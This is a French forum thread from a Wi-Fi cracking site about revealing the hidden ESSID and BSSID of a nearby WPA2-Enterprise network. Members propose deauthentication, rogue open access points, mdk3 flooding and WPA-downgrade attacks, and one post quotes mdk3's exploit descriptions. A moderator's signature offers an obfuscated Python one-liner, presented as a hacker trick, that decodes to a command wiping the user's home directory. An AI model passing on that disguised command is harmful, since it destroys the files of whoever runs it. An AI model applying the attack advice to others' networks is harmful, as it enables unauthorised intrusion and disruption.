Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-01-2013 23:30:21

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

reseau masqué

slt a tous! je rencontre un probleme sur la decouverte du essid d'un reseau. airodump mais lenght 0 et le bssid est 00:00:00:00:00:00. ce ki veu dire ke le reseau cache le essid et le bssid. j'ai essayé wireshark en snifan les trames. rien a faire. jai aussi utilié airodump avec la commande death jusque la! QUELQU'UN POURRAIT MAIDER???

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-01-2013 05:05:38

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : reseau masqué

oui. Mais d'abord tu vas reformuler. Ton cas est intéressant.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 24-01-2013 06:47:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : reseau masqué

Salut smile

Que le réseau soit caché ok mais le bssid c'est déga plus rare, perso j'ai jamaisv u de bssid rempli de 0, essai de jouer avec les différentes options d'airbase-ng et cette méthode si tu n'arrive pas a retrouver le réseau.

Retrouver un réseau cacher avec airbase

Hors Ligne

#4 24-01-2013 13:02:52

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : reseau masqué

Et que dis Kismet ?


Rien non plus ??



Jamais vu ça aussi ... (en dehors d'une rogue mal faîte) lol

Dernière modification par Furyo (24-01-2013 21:10:15)


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#5 24-01-2013 13:10:53

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

airodump mais 00:00:00:00:00:00. par contre il ya vraimant un personne connecté.

Hors Ligne

#6 24-01-2013 13:12:35

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

avec un adresse normal.

Hors Ligne

#7 24-01-2013 15:52:05

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : reseau masqué

on peut cache le bssid  j ai du mal a croire car comment un appareille peut savoir si il est co au bon point d acces ?

Hors Ligne

#8 24-01-2013 18:26:24

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

cè bien le cas! es ke je peux posté des foto sur ce site ? pour ke vous voyé vous mm? si non je ne sai pa si cè vraiment sont addresse avec plein de zero?

Hors Ligne

#9 24-01-2013 21:05:54

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : reseau masqué

Oui  stark poste tes images que nous puissions voir .

Hors Ligne

#10 25-01-2013 16:52:56

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : reseau masqué

Oui  stark poste tes images que nous puissions voir .

plus_un

Hors Ligne

#11 05-02-2013 21:56:12

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

dsl pour ce long retard. voici la tof dont je vous ai parlé. jai utilisé la commande airodump. voici le lien pour la foto: http://www.mediafire.com/view/?tflilwuhdy5ez2j

Hors Ligne

#12 05-02-2013 21:57:52

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

jaten vos suggestion

Hors Ligne

#13 07-02-2013 23:48:55

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : reseau masqué

A mon avis, il y a 3 possibilités :
- un bug d'airodump-ng, ou bien un émetteur défectueux (ou les deux en fait)
- quelqu'un qui fait des tests et c'est un peu foireux
- un parano qui masque même son BSSID (un peu excessif, mais pourquoi pas)

J'hésite, je pencherais pour le troisième cas, mais avec 2 beacons et 0 data en 12 minutes, c'est bizarre. Il faudrait faire un scan "long" (5-10 minutes) en verrouillant sur le canal 10, pour voir si la station associée échange des données avec l'AP ou pas.

Dans tous les cas, si ce réseau n'est pas à toi, il est protégé en WPA2 donc tu n'as rien à faire dessus wink

Hors Ligne

#14 08-02-2013 13:19:26

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : reseau masqué

C'est un cas intéressant tout de meme, je pense qu'on a affaire a un connaisseur.D'autre part AUTH MGT j'en vois pas partout non plus a part sur certaine freebox, mais cette dernière comme d'autres box ne change pas son bssid comme ça.Donc il faudrait s'orienter et faire une recherche sur les routeurs permettant ça, sinon ya t-il une entreprise près de chez toi?

Si j'étais toi je me pencherai sur le code source de mdk3 qui peut bruteforcer le ssid du réseau, voir si il y a pas moyen de changer quelque options pour appliquer ça au bssid.Dans ton cas l'attaque classique par deauth et dico est inutile va falloir faire plus fin wink

D'autres options serait possible avec airbase pour l'attirer sur un fake en OPEN (option -P 30) et le laisser se reconnecter a son réseau en suivant voir si au moment de sa reconnexion airodump révèle des choses wink

Dernière modification par koala (08-02-2013 13:23:07)

Hors Ligne

#15 08-02-2013 19:40:40

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : reseau masqué

Hors Ligne

#16 08-02-2013 20:21:23

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : reseau masqué

On ne peut pas masquer un BSSID, ça rendrait le réseau impossible à utiliser. Donc ce qu'on voit là est le vrai (et seul) BSSID du réseau concerné, il n'y a rien à bruteforcer.

La question, c'est de savoir pourquoi quelqu'un a choisi de changer son BSSID de cette façon (si c'est volontaire). Ca peut être de la parano portée à l'extrême (masquer jusqu'à la marque de son AP), ou bien une erreur/un bug.
Le chiffrement en "MGT" (qui correspond au WPA "Entreprise", avec serveur Radius) n'est pas réservé aux professionnels, on peut le déployer chez soi aussi, mais c'est vachement lourd à mettre en œuvre et sans intérêt pour un particulier (sauf s'il est parano, ce qui n'est pas exclu). Notons également que ce n'est pas forcément du matériel "grand public", ça peut être une machine sous Linux avec airbase-g ou hostapd (ou d'autres programmes équivalents) configuré en point d'accès.

@koala : plus subtil, moi je bloquerais juste le trafic WPA pour le forcer à désactiver le chiffrement et utiliser le réseau en OPN (pour sniffer le trafic) plutôt qu'essayer de l'attirer sur un Rogue AP. Si ce que nous voyons ici est volontaire, le mec en face s'y connaît assez pour ne pas se faire piéger. Les attaques de type WPA downgrade sont plus discrètes et plus rares... mdk3 permet ça, de mémoire il y en avait un autre aussi mais je retombe pas dessus (airdrop-ng ?).

Hors Ligne

#17 09-02-2013 09:50:55

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : reseau masqué

le mec en face s'y connaît assez pour ne pas se faire piéger.


Il a du apprendre dans l'ombre sur le site lol

@koala : plus subtil, moi je bloquerais juste le trafic WPA pour le forcer à désactiver le chiffrement et utiliser le réseau en OPN (pour sniffer le trafic) plutôt qu'essayer de l'attirer sur un Rogue AP.

J'ai penser au downgrade mais si il s'y connait peut-etre qu'il a configurer son truc de sorte a placer une limite pour le surplus de flood, mais mdk3 avec l'option -a association intempestive et airdrop-ng effectivement ça devrait le perturber un peu quand meme wink

Hors Ligne

#18 10-02-2013 01:50:11

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

ok merci. je vai testé sa! Mais je vous rassure cè un particulié qui a cela. et cè la premiere foi ke je voi un truc pareil. pour faire cour il ma lancé un defi: retrouve mon bssid et mon essid. dc jai interet a reussir. ofet je ne mi connai pa assez bien dans back track dc fodrai un peu maider avec les commandes.

Hors Ligne

#19 10-02-2013 01:53:45

stark
Nouveau membre
Inscription : 23-01-2013
Messages : 8

Re : reseau masqué

@koala ya vraiment pa dentreprise ou je sui.

Hors Ligne

#20 11-02-2013 15:56:43

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : reseau masqué

@koala : je pensais aux attaques spécifiques contre le WPA, et pas un "flood" classique wink

- Michael Countermeasure Exploit (also known as TKIP QoS Exploit)
Shuts down APs using TKIP encryption and QoS Extension with 1 sniffed and 2 injected QoS Data Packets

- WPA-Downgrade Test
Deauthenticates Stations and APs sending WPA encrypted packet
With this test you can check if the sysadmin will try WEP or even disables encryption
mdk3 will let WEP and unencrypted clients work, so if the sysadmin simply thinks "WPA is broken" he sure isn't the right one for this job. (this can/should be combined with social engineering)

@stark : s'il a modifié son BSSID, il n'est pas "caché" ni récupérable. Tu n'as aucun moyen technique pour le retrouver, mais tu as peut-être une chance en capturant son chien (ou sa femme, à voir à qui il tient le plus) wink

Pour ce qui est du SSID, on en a déjà parlé sur le forum :
- tu sniffes tout ce qui passe et tu attends que quelqu'un se connecte dessus
- tu bruteforces en testant toutes les possibilités
La seconde option est beaucoup plus lourde et moins fiable que la première, autant dire que si personne ne se connecte sur le réseau en question t'es ba*sé wink
Soit dit en passant, la récupération d'un SSID masqué n'a rien à voir avec le sujet ici, crée un autre topic si tu veux en discuter.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Perte de réseau wifi par BrunoB
4 252 12-09-2016 17:20:15 par BrunoB
2 372 08-08-2016 22:49:22 par Olympe
4 251 28-07-2016 16:41:30 par rsl
2 665 28-04-2016 14:59:43 par kcdtv
1 567 15-04-2016 20:30:17 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]